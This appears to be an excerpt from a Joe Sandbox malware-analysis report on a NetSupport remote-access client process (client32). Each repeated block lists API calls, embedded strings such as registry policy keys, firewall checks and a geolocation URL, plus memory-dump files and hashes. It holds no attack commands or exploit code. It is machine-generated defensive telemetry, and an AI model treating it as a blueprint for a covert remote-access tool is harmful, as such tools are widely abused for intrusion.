                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorModeObject$CloseExchangeInterlockedQueryStockValue__isdigit_l
                                                                                                                        • String ID: .%d$3$CurrentMajorVersionNumber$CurrentMinorVersionNumber$CurrentVersion$Error %s unloading audiocap dll$pcicl32
                                                                                                                        • API String ID: 3298063328-2190704750
                                                                                                                        • Opcode ID: 0368fc6ba5d118a56a23de13d07dfbd221bb1150da24c248aa16321da6633758
                                                                                                                        • Instruction ID: 9f43229105984b1126c86cbd82377d9c7f2924e853b9011d381d79a7883068f9
                                                                                                                        • Opcode Fuzzy Hash: 0368fc6ba5d118a56a23de13d07dfbd221bb1150da24c248aa16321da6633758
                                                                                                                        • Instruction Fuzzy Hash: E0D1F8B0D163599FEB11CBA48C84BAEFBF5AB8430CF1041E9D449A7288FB715A44CB52
                                                                                                                        APIs
                                                                                                                        • LoadLibraryA.KERNEL32(PCIINV.DLL,7E4636A2,02566C50,02566C40,?,00000000,1117ED9C,000000FF,?,11031392,02566C50,00000000,?,?,?), ref: 11084F85
                                                                                                                          • Part of subcall function 1110C420: wsprintfA.USER32 ref: 1110C454
                                                                                                                          • Part of subcall function 1110C420: _memset.LIBCMT ref: 1110C477
                                                                                                                          • Part of subcall function 1110C520: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76EEC3F0,?,1110D1BD,00000000,00000001,?,?,?,000000FF,?,11026F57), ref: 1110C53E
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetInventory), ref: 11084FAB
                                                                                                                        • GetProcAddress.KERNEL32(00000000,Cancel), ref: 11084FBF
                                                                                                                        • GetProcAddress.KERNEL32(00000000,GetInventoryEx), ref: 11084FD3
                                                                                                                        • wsprintfA.USER32 ref: 1108505B
                                                                                                                        • wsprintfA.USER32 ref: 11085072
                                                                                                                        • wsprintfA.USER32 ref: 11085089
                                                                                                                        • CloseHandle.KERNEL32(00000000,11084DB0,00000001,00000000), ref: 110851DA
                                                                                                                          • Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,74DEF550,?,?,11085200,?,11031392,02566C50,00000000,?,?,?), ref: 11084BD8
                                                                                                                          • Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,74DEF550,?,?,11085200,?,11031392,02566C50,00000000,?,?,?), ref: 11084BEB
                                                                                                                          • Part of subcall function 11084BC0: CloseHandle.KERNEL32(?,74DEF550,?,?,11085200,?,11031392,02566C50,00000000,?,?,?), ref: 11084BFE
                                                                                                                          • Part of subcall function 11084BC0: FreeLibrary.KERNEL32(00000000,74DEF550,?,?,11085200,?,11031392,02566C50,00000000,?,?,?), ref: 11084C11
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandlewsprintf$AddressProc$Library$CreateEventFreeLoad_memset
                                                                                                                        • String ID: %s_HF.%s$%s_HW.%s$%s_SW.%s$Cancel$GetInventory$GetInventoryEx$PCIINV.DLL
                                                                                                                        • API String ID: 3281479988-2492245516
                                                                                                                        • Opcode ID: 31bc0f0ac908e73c9262357e0f29979773ffb83f4654f2e723ad6fc38f51b4df
                                                                                                                        • Instruction ID: 32114b85bd35150ab9ff672105bee8b4aca5606f1db728b838d963d94260b1c4
                                                                                                                        • Opcode Fuzzy Hash: 31bc0f0ac908e73c9262357e0f29979773ffb83f4654f2e723ad6fc38f51b4df
                                                                                                                        • Instruction Fuzzy Hash: 8271B1B5E0470AABEB11CF79CC45BDAFBE5EB48304F10456AE95AD72C0EB71A500CB91
                                                                                                                        APIs
                                                                                                                        • OpenMutexA.KERNEL32(001F0001,?,PCIMutex), ref: 11030073
                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000000,PCIMutex,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103008C
                                                                                                                        • GetProcAddress.KERNEL32(?,SetProcessDPIAware), ref: 11030109
                                                                                                                        • SetLastError.KERNEL32(00000078,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103011F
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000001F4,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103014E
                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103015B
                                                                                                                        • FreeLibrary.KERNEL32(?,?,?,?,?,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 11030166
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,PCIMutex,?,SOFTWARE\Policies\NetSupport\Client\standard,00020019), ref: 1103016D
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CloseHandleMutex$AddressCreateErrorFreeLastLibraryObjectOpenProcSingleWait
                                                                                                                        • String ID: /247$PCIMutex$SOFTWARE\Policies\NetSupport\Client\standard$SetProcessDPIAware$_debug\trace$_debug\tracefile$istaUI
                                                                                                                        • API String ID: 2061479752-1320826866
                                                                                                                        • Opcode ID: de79c64c3cbc319c321437111ac499bab6d77cae53018e637abb465631a425fd
                                                                                                                        • Instruction ID: 54878425dae39cfb29a1127824abcf245d41d7cdbe78275a25fd6106d4eefb26
                                                                                                                        • Opcode Fuzzy Hash: de79c64c3cbc319c321437111ac499bab6d77cae53018e637abb465631a425fd
                                                                                                                        • Instruction Fuzzy Hash: 1851FB74E1131B9FDB11DB61CC88B9EF7B49F84709F1044A8E919A3285FF706A40CB62
                                                                                                                        APIs
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000102), ref: 11027E61
                                                                                                                          • Part of subcall function 11080BE0: _strrchr.LIBCMT ref: 11080BEE
                                                                                                                        • wsprintfA.USER32 ref: 11027E84
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 11027EC9
                                                                                                                        • GetExitCodeProcess.KERNEL32(?,?), ref: 11027EDD
                                                                                                                        • wsprintfA.USER32 ref: 11027F01
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 11027F17
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 11027F20
                                                                                                                        • LoadLibraryExA.KERNEL32(?,00000000,00000002), ref: 11027F81
                                                                                                                        • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 11027F95
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Handle$CloseModulewsprintf$CodeExitFileLibraryLoadNameObjectProcessSingleWait_strrchr
                                                                                                                        • String ID: "$Locales\%d\$SetClientResLang called, gPlatform %x$Setting resource langid=%d$\GetUserLang.exe"$pcicl32_res.dll
                                                                                                                        • API String ID: 512045693-1744591295
                                                                                                                        • Opcode ID: 0c549729b7108691d0ef4b476a02272bb4edcc2e78ff917f042e0d38bced481d
                                                                                                                        • Instruction ID: 42811afe57253d3bd896070464278dee24b8baf42e1d510c4721ed0fe76631d9
                                                                                                                        • Opcode Fuzzy Hash: 0c549729b7108691d0ef4b476a02272bb4edcc2e78ff917f042e0d38bced481d
                                                                                                                        • Instruction Fuzzy Hash: 7A41E874E04229ABD710CF69CCC5FEAF7B9EB44708F4081A9F95997244DBB0A940CFA0
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 1110C340: SetEvent.KERNEL32(00000000), ref: 1110C364
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C075
                                                                                                                        • GetTickCount.KERNEL32 ref: 1102C09A
                                                                                                                          • Part of subcall function 110CE440: __strdup.LIBCMT ref: 110CE45A
                                                                                                                        • GetTickCount.KERNEL32 ref: 1102C194
                                                                                                                          • Part of subcall function 110CF0A0: wvsprintfA.USER32(?,?,1102C131), ref: 110CF0CB
                                                                                                                          • Part of subcall function 110CE4F0: _free.LIBCMT ref: 110CE51D
                                                                                                                        • WaitForSingleObject.KERNEL32(?,000000FF), ref: 1102C28C
                                                                                                                        • CloseHandle.KERNEL32(?), ref: 1102C2A8
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CountObjectSingleTickWait$CloseEventHandle__strdup_freewvsprintf
                                                                                                                        • String ID: ?IP=%s$GeoIP$GetLatLong=%s, took %d ms$IsA()$LatLong$_debug$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h$http://geo.netsupportsoftware.com/location/loca.asp
                                                                                                                        • API String ID: 596640303-1725438197
                                                                                                                        • Opcode ID: 9b28a0c5fe058d41c17dc5cbf4775d5046d0febd8a8561296b22eecfd3096bab
                                                                                                                        • Instruction ID: 3aa9c337b4ddfc5cec58a31574b691e2179c4186c787a947626ae142730ffe10
                                                                                                                        • Opcode Fuzzy Hash: 9b28a0c5fe058d41c17dc5cbf4775d5046d0febd8a8561296b22eecfd3096bab
                                                                                                                        • Instruction Fuzzy Hash: FD81A534E0015A9BDB04DBE4CD90FEDF7B5AF45708F508698E92567281DF34BA09CB61
                                                                                                                        APIs
                                                                                                                        • RegOpenKeyExA.KERNEL32(80000002,Software\Policies\NetSupport\Client,00000000,00020019,?,?,?,00000001), ref: 11060CFA
                                                                                                                          • Part of subcall function 110606E0: RegOpenKeyExA.ADVAPI32(00000003,?,00000000,00020019,?,?), ref: 1106071C
                                                                                                                          • Part of subcall function 110606E0: RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,?,?,?,?,00000000), ref: 11060774
                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000), ref: 11060D4B
                                                                                                                        • RegEnumKeyExA.ADVAPI32(?,00000001,?,00000100,00000000,00000000,00000000,00000000), ref: 11060E05
                                                                                                                        • RegCloseKey.ADVAPI32(?), ref: 11060E21
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Enum$Open$CloseValue
                                                                                                                        • String ID: %s\%s\%s\$Client$Client$Client.%04d.%s$DisableUserPolicies$Software\Policies\NetSupport$Software\Policies\NetSupport\Client$Software\Policies\NetSupport\Client\Standard$Standard
                                                                                                                        • API String ID: 2823542970-1528906934
                                                                                                                        • Opcode ID: b877e26e7d009999af9ff80ad30fe88221b222cadef016393b27e04480797841
                                                                                                                        • Instruction ID: 58f2a140e2c2e5d4e6e19389d5fc2da1bb8dcdaa9b5c120dc596b7fa4edf654c
                                                                                                                        • Opcode Fuzzy Hash: b877e26e7d009999af9ff80ad30fe88221b222cadef016393b27e04480797841
                                                                                                                        • Instruction Fuzzy Hash: 834172B5E4022DABE721CB11CC81FEEF7BCEB54708F1041D9E658A6140DAB06E81CFA5
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                        • GetTickCount.KERNEL32 ref: 11134B22
                                                                                                                          • Part of subcall function 11095C90: CoInitialize.OLE32(00000000), ref: 11095CA4
                                                                                                                          • Part of subcall function 11095C90: CLSIDFromProgID.COMBASE(HNetCfg.FwMgr,?,?,?,?,?,?,?,11134B2B), ref: 11095CBE
                                                                                                                          • Part of subcall function 11095C90: CoCreateInstance.OLE32(?,00000000,00000001,111BBFCC,?,?,?,?,?,?,?,11134B2B), ref: 11095CDB
                                                                                                                          • Part of subcall function 11095C90: CoUninitialize.OLE32(?,?,?,?,?,?,11134B2B), ref: 11095CF9
                                                                                                                        • GetTickCount.KERNEL32 ref: 11134B31
                                                                                                                        • _memset.LIBCMT ref: 11134B73
                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,?,00000105), ref: 11134B89
                                                                                                                        • _strrchr.LIBCMT ref: 11134B98
                                                                                                                        • _free.LIBCMT ref: 11134BEA
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640034517.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640012267.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640137629.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640176357.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640204910.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640226374.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_11000000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: CountTick$CreateFileFromInitializeInstanceModuleNameProgUninitialize__wcstoi64_free_memset_strrchr
                                                                                                                        • String ID: *AutoICFConfig$Client$ICFConfig$ICFConfig2 returned 0x%x$IsICFPresent() took %d ms$IsICFPresent...$No ICF present
                                                                                                                        • API String ID: 711243594-1270230032
                                                                                                                        • Opcode ID: 7f73c592d2f4cebf0d14d0daa45c6ac975457230d299cd01f04b673b457344e7
                                                                                                                        • Instruction ID: 780d96002ff1c571f3ab58ca649bc9daa74988097748e2877fc37ba21b2c8ed0
                                                                                                                        • Opcode Fuzzy Hash: 7f73c592d2f4cebf0d14d0daa45c6ac975457230d299cd01f04b673b457344e7
                                                                                                                        • Instruction Fuzzy Hash: C541AE76E0022D9BD720DBB59C41BEBF768DB5531CF0044BAED1997240EA71AA84CFE1
                                                                                                                        APIs
                                                                                                                        • ioctlsocket.WSOCK32 ref: 68597642
                                                                                                                        • connect.WSOCK32(00000000,?,?), ref: 68597659
                                                                                                                        • WSAGetLastError.WSOCK32(00000000,?,?), ref: 68597660
                                                                                                                        • _memmove.LIBCMT ref: 685976D3
                                                                                                                        • select.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 685976F3
                                                                                                                        • GetTickCount.KERNEL32 ref: 68597717
                                                                                                                        • ioctlsocket.WSOCK32 ref: 6859775C
                                                                                                                        • SetLastError.KERNEL32(00000000,00000000,?,00000010,00000002,00000001,00000000,?,00000000,00000000), ref: 68597762
                                                                                                                        • WSAGetLastError.WSOCK32(00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000,?,00000000), ref: 6859777A
                                                                                                                        • __WSAFDIsSet.WSOCK32(00000000,?,00000001,00000000,?,?,?,?,?,00001004,00000000,?,00000010,00000002,00000001,00000000), ref: 6859778B
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000007.00000002.3640531103.0000000068591000.00000020.00000001.01000000.0000000F.sdmp, Offset: 68590000, based on PE: true
                                                                                                                        • Associated: 00000007.00000002.3640512023.0000000068590000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640564264.00000000685D0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640584209.00000000685D9000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DA000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640610273.00000000685DE000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        • Associated: 00000007.00000002.3640651811.00000000685E0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_7_2_68590000_client32.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorLast$ioctlsocket$CountTick_memmoveconnectselect
                                                                                                                        • String ID: *BlockingIO$ConnectTimeout$General
                                                                                                                        • API String ID: 4218156244-2969206566
                                                                                                                        • Opcode ID: 61f03a1447485143ed1d0816d7ff156a9df704f61ee99658cd394b56f53389da
                                                                                                                        • Instruction ID: 30e65d9f3c13ca9ba06203294eaad4451362e010f8f7e2b579c452b5405bcc0f
                                                                                                                        • Opcode Fuzzy Hash: 61f03a1447485143ed1d0816d7ff156a9df704f61ee99658cd394b56f53389da
